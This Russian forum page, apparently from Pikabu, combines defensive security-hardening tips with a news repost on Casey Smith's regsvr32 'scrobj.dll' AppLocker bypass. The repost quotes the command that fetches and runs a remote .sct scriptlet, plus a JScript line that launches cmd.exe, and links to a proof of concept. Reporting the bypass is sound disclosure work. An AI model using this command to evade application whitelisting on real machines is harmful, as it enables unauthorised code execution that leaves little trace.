6. Используйте сканеры файловой системы. Любая атака любым вирусом затронет файловую систему. Сканеры ФС хранят таблицу файлов и хешей и отслуживают обращения к файлам, если пошли необычные манипуляции с ФС - вы атакованы.

7. Не используйте "типовые" решения. На типовые решения есть типовые пути обхода этих решений. Думайте и фантазируйте как направить атаку с реальных машин в какую-нибудь "выгребную яму" (или в приготовленную DMZ). Позаботьтесь о достоверности "выгребной ямы", данные в ней должны быть во-первых бесполезны для взломщика, а во-вторых быть правдоподобными иначе он поймет что его наеобманули и будет менять вектор атаки.

8. Защита начинается с установки. Еще на стадии установки ОС можно обезопасить себя от очень многих типовых угроз. Во-первых готовый к эксплуатации образ ОС нужно скопировать на отдельный раздел (в случае заражения достаточно будет восстановить ОС из образа), во-вторых средствами ОС или сторонним софтом прописать "белые" исполняемые файлы и запретить исполнение всех остальных, в-третьих отключить автозагрузку всех устройств, в четвертых минимизировать используемое ПО поставляемое с ОС.

9. Документируйте все. Никто и ничто не вечно, а память несовершенна. Грамотно составленная документация позволяет во-первых иметь четкое понимание ситуации, во-вторых иметь представление о возможных угрозах, а в-третьих спланировать устранение последствий взлома.  

A. Полюбите бумагу, а не файлы. Файлы легко могут быть скопированы, а вот с бумагой проделать такое гораздо сложнее. Все критически важные пароли ни в коем случае не должны сохраняться или храниться в файлах. Пароли "второго уровня" должны храниться только в локальных менеджерах паролей, а вот пароли от "спамерских" учеток можно выписать в блокнот на рабочем столе.

B. Не доверяй никому и ничему. За единичными исключениями все что мы видим на мониторе - плод работы программ которые могут уже быть заражены. Повторить интерфейс чего-либо задача очень простая, поэтому при угрозе

C. Самая большая угроза ИБ сидит перед монитором. Самый легкий взлом - через пользователя ЭВМ, поэтому пользователь должен быть максимально ограничен в возможностях на компьютере. Есть одна папка с документами и доступ к программам используемым в работе, остальное - запрещено. Проводить разъяснения и учения по ИБ.  

D. Профилактика уменьшает глубину жопы. В моей практики были случай когда два месяца напряженной работы сисадмина привели к тому, что атака инициированная поддельным письмом из ПФР для бухгалтера провалилась (при детектировании изменений файлов вырубили комп) и работоспособность была восстановлена примерно за 30 минут.

E. Считайте что Вас уже взломали. Гораздо больше времени уделяйте не защите, а способам во-первых затруднить доступ к критически важным данным и во-вторых максимально быстро восстановить работоспособность системы. Чем сложнее организован несанкционированный доступ к данным, тем больше взломщики будут в сети и тем выше шанс обнаружения вторжения, а значит выше шанс детектирования и начала противодействия. Чем быстрее можно восстановить работоспособность системы тем меньше будет простой организации и соответственно убытков. Тут есть океаны способов, которые перепробовать жизни не хватит.

F. Взломайте себя сами. Если знаешь как взломать, то соответственно будешь знать как себя защитить.


И напоследок (самое главное) - аудит. Введите себе в привычку проверять что твориться в компьютере загрузившись с "живого" образа ОС (желательно с диска восстановления антивируса) и посмотрите - все ли в порядке?


Информационная безопасность, это не единичное действие и не набор действий, а постоянный и не прерываемый процесс.


Спасибо за внимание и удачи!

Показать полностью
1351

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ

Независимый исследователь Кейси Смит (Casey Smith) обнаружил интересный способ обхода средства безопасности Windows AppLocker. Техника Смита не требует привилегий администратора. Всё, что понадобится для атаки, это лишь короткая команда, код которой уместится даже в один твит.
Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ Взлом, Windows, Хакеры, Команда, Обход, Защита, Безопасность, Длиннопост

Windows AppLocker впервые появился в системах Microsoft с релизом Windows Server 2008 R2 и Windows 7. По сути, эта функция позволяет администратору задавать определенные правила для приложений, определяя, что может и чего не может запустить пользователь (или группа пользователей). К примеру, можно запретить запуск на компьютере любых программ, которые не относятся к рабочей деятельности сотрудника.


Тогда как администраторы привыкли доверять AppLocker, Кейсти Смит пишет, что обойти его ограничения возможно, более того, проделать это весьма легко.


Фактически Смит предложил использовать не по назначению Regsvr32 и с его помощью скачать из интернета определенный файл. Для этого потребуется команда вида:


regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll


Исполнение этой команды приведет к скачиваю XML-файла, который приведет к запуску cmd.exe. Кроме того, cmd.exe можно заменить на любую другую программу, и не важно, какие ограничения установлены в AppLocker: программа всё равно успешно запустится.


Как это работает? Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows. Если разбирать команду Смита: /s в коде обязывает Regsvr32 работать тихо, /n приказывает не использовать DllRegisterServer, /u означает, что мы пытаемся осуществить отмену регистрации, а параметр /i отвечает за ссылку и DLLinstall. В свою очередь, scrobj.dll – это Script Component Runtime.


Смит обнаружил, что Regsvr32 обработает URL и доставит на машину заданный файл через HTTP или HTTPS. Исследователь добавил немного JavaScript к своему XML-файлу и инициировал его исполнение через запрос на отмену регистрации .DLL. Таким образом, обход AppLocker становится весьма простым трюком, веь любой пользователь может отправить запрос на отмену регистрации.


«Это не слишком задокументированная [функция], но regsvr32.exe может принять ссылку на скрипт. Чтобы уязвимость сработала, поместите код (VB или JS) внутрь элемента <registration>», — пишет Смит.

Так, в описанном выше примере JavaScript использует ActiveX:


var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");


Атака Смита не требует привилегий администратора, может быть выдана за обычную сессию HTTP, и не должна оставить ни единого следа на жестком диске жертвы, так как не затрагивает реестр и работает непосредственно с памятью. Никаких патчей на данный момент не существует, разве что Regsvr32 можно отрезать от интернета при помощи файервола.


Исследователь опубликовал на GitHub свой proof-of-concept, который может пригодиться системным администраторам и пентестерам.

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ Взлом, Windows, Хакеры, Команда, Обход, Защита, Безопасность, Длиннопост

Материалы:

Windows AppLocker https://technet.microsoft.com/ru-ru/library/ee424367.aspx

Кейсти Смит пишет об обходе http://subt0x10. блогспот .ru/2016/04/bypass-application-whitelisting-script.html

Regsvr32 https://technet.microsoft.com/en-us/library/bb490985.aspx

XML-файл запускающий cmd.exe https://gist.githubusercontent.com/subTee/24c7d8e1ff0f560209...

Как параметр /i отвечает за ссылку и DLLinstall https://msdn.microsoft.com/en-us/library/windows/desktop/bb7...

Proof-of-conceptна исследователя на GitHub https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d...

Пруф https://xakep.ru/2016/04/22/applocker-bypass/

Показать полностью 1
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: